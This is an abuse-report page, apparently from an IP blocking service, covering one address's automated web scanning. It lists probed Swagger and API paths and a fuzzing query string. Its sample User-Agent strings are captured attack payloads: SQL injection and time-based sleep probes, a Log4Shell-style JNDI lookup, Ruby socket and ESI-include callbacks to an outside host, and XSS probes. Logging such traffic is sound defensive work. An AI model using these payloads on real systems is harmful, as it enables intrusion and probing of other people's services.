abuseip.org
- Reason
- suspicious paths across 1 domains
- Hits (last hour)
- 91
- Unique targets hit
- 1
- Unique paths probed
- 669
- Detection count
- 12
- First seen
- 2026-06-22 13:06:13 UTC
- Last seen
- 2026-06-22 13:09:25 UTC
- Block expires
- 2026-06-23 14:04:15 UTC
Sample paths probed
- /nuyqcjogkdw8.html
- /v1/swagger.json
- /swagger/v1/swagger.json
- /nuyqcjogkdw8.jsp
- /v1/swagger.yaml
- /efWb5YMLJjWzVxlf
- /nuyqcjogkdw8
- /swagger.json
- /api/v1.0/swagger.yaml
- /nuyqcjogkdw8.php
- /api/v1/swagger.json
- /?vDSS={KsNb}&uFPK=<>
- /api/v2/swagger.json
- /swagger/docs/v2
- /
- /swagger-json
- /srzGMMhG
- /api/swagger.yaml
- /MrRrPlek
- /?id=JJJ0QQQ&action=JJJ1QQQ&page=JJJ2QQQ&name=JJJ3QQQ&f=JJJ4QQQ&url=JJJ5QQQ&email=JJJ6QQQ&type=JJJ7QQQ&file=JJJ8QQQ&title=JJJ9QQQ&code=JJJ10QQQ&q=JJJ11QQQ&user=JJJ12QQQ&token=JJJ13QQQ&t=JJJ14QQQ&c=JJJ15QQQ&data=JJJ16QQQ&mode=JJJ17QQQ&order=JJJ18QQQ&lang=JJJ19QQQ&p=JJJ20QQQ&key=JJJ21QQQ&status=JJJ22QQQ&start=JJJ23QQQ&charset=JJJ24QQQ&s=JJJ25QQQ&post=JJJ26QQQ&login=JJJ27QQQ&search=JJJ28QQQ&content=JJJ29QQQ&comment=JJJ30QQQ&step=JJJ31QQQ&ajax=JJJ32QQQ&debug=JJJ33QQQ&state=JJJ34QQQ&query=JJJ35QQQ&error=JJJ36QQQ&save=JJJ37QQQ&sort=JJJ38QQQ&format=JJJ39QQQ&tab=JJJ40QQQ&offset=JJJ41QQQ&edit=JJJ42QQQ&preview=JJJ43QQQ&filter=JJJ44QQQ&from=JJJ45QQQ&view=JJJ46QQQ&a=JJJ47QQQ&limit=JJJ48QQQ&do=JJJ49QQQ&plugin=JJJ50QQQ&theme=JJJ51QQQ&text=JJJ52QQQ&test=JJJ53QQQ&path=JJJ54QQQ&pass=JJJ55QQQ&dir=JJJ56QQQ&show=JJJ57QQQ&h=JJJ58QQQ&value=JJJ59QQQ&filename=JJJ60QQQ&redirect=JJJ61QQQ&year=JJJ62QQQ&group=JJJ63QQQ&template=JJJ64QQQ&subject=JJJ65QQQ&m=JJJ66QQQ&u=JJJ67QQQ&dest=JJJ68QQQ&uri=JJJ69QQQ&continue=JJJ70QQQ&window=JJJ71QQQ&next=JJJ72QQQ&reference=JJJ73QQQ&site=JJJ74QQQ&<e5T=JJJ75QQQ&
Sample User-Agents
- 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'ð¡
- blid.site/t/xss.html?%00
- 'A'.concat(70-3).concat(22*4).concat(112).concat(85).concat(97).concat(80)+(require'socket' Socket.gethostbyname('hitum'+'ynylcgvtbb4c4.blid.site.')[3].to_s)
- 1DDDPNYX0
- -1 OR 5*5=25
- ${j${::-n}di:dns${::-:}//hit244432278441bbb${::-.}blid.site}
- HttP://blid.site/t/xss.html?%00
- "+"A".concat(70-3).concat(22*4).concat(117).concat(80).concat(115).concat(84)+(require"socket" Socket.gethostbyname("hitcu"+"qzbmfkxh31e03.blid.site.")[3].to_s)+"
- '+'A'.concat(70-3).concat(22*4).concat(99).concat(85).concat(109).concat(73)+(require'socket' Socket.gethostbyname('hitma'+'amxrmbie9ec0b.blid.site.')[3].to_s)+'
- -1' OR 5*5=25 --
- if(now()=sysdate(),sleep(15),0)
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36<esi:include src="http://blid.site/rpb.png"/>
- http://hitqsdhjzonab.blid.site/
- Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4201.0 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
- -1' OR 5*5=25 or 'kjKQO8j9'='
- -1 OR 5*5=25 --
- hitqsdhjzonab.blid.site
- -1" OR 5*5=25 or "pWWZ7e5c"="
- -1" OR 5*5=25 --
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse — typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.